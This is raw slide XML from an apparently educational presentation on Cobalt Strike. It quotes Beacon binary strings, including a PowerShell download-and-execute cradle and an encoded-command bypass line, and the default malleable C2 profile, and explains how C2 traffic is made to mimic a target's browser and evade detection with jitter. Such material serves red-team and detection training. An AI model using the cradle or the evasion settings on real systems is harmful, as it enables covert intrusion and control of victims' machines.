                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%%IMPORT%%";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Command length (%d) too long";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.Webclient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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('http://127.0.0.1:%u/'); %s";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powershell</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nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -exec bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> \"%s\"";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "?%s=%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s&amp;%s=%s";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 %s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s&amp;%s";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kill %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s	%d	%d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s	%d	%d	%s	%s	%d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s\\*";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "sha256";</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abcdefghijklmnop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sprng</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create pipe: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "I'm already in SMB mode";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s (admin)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open process: %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to impersonate token from %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to duplicate primary token for %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to impersonate logged on user %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not create token: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "HTTP/1.1 200 OK";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Content-Type: application/octet-stream";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Content-Length: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Microsoft Base Cryptographic Provider v1.0";</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 for an HTTP GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-get {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	# Beacon will randomly choose from this pool of URIs</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uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "/ca /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dpixel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /__utm.gif /pixel.gif /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g.pixel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /dot.gif /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>updates.rss</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fwlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /cm /cx /pixel /match /visit.js /load /push /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /j.ad /ga.js /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en_US</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/all.js /activity /IE9CompatViewList.xml";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client {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# base64 encode session metadata and store it in the Cookie header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		metadata {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			base64;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			header "Cookie";</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server {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# server should send output with no changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		header "Content-Type" "application/octet-stream";</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 for an HTTP POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-post {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]</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uri</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submit.php</a:t>
            </a:r>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client {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		header "Content-Type" "application/octet-stream";</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transmit our session identifier as /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>submit.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=[identifier]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		id {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			parameter "id";</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post our output with no real changes</a:t>
            </a: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The server's response to our HTTP POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	server {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		header "Content-Type" "text/html";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this will just print an empty string, meh...</a:t>
            </a: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indicators/attributes for a DNS Beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-beacon {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    # maximum number of bytes to send in a DNS A record request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maxdns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    "255";</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set beacon "";</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get_A</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cdn</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get_AAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "www6.";</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get_TXT</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api</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put_metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "www.";</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put_output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "post.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="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13631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r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The concept behind malleable C2 profiles means you can make your C2 look like legitimate things in your environment. You go into the environment, whether it's a packet capture or whether you're just doing enough enumeration to find out exactly what browsers they use, and make your C2 look just like one of the their browsers itself and then you set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> to the actual browser they use and maybe the beacon itself running in memory will look just like their browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Some of the things you will find in the profiles include features like jitter, which is a deviation in the callback times the beacon uses. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Sleeptime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> is how many seconds you sleep and pause between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>communcations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> up to the C2 server. The jitter will help your beacons avoid detection. You can set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>useragent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> options, and named pipes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>CS Default Profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The default profile values for Cobalt Strike 4.5 intend to be “noisy” on purpose. The following is the default profile for this version of Cobalt Strike.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following profile does not designate a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpawnTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” process. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="none" dirty="0"/>
              <a:t>The default process, if not defined, is rundll32.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># default sleep time is 60s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sleeptime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "60000";</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jitter factor 0-99% [randomize callback times]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set jitter    "0";</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indicate that this is the default Beacon profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sample_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Cobalt Strike Beacon (Default)";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this is the default profile. Make sure we look like Cobalt Strike's Beacon payload. (that's what we are, right?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
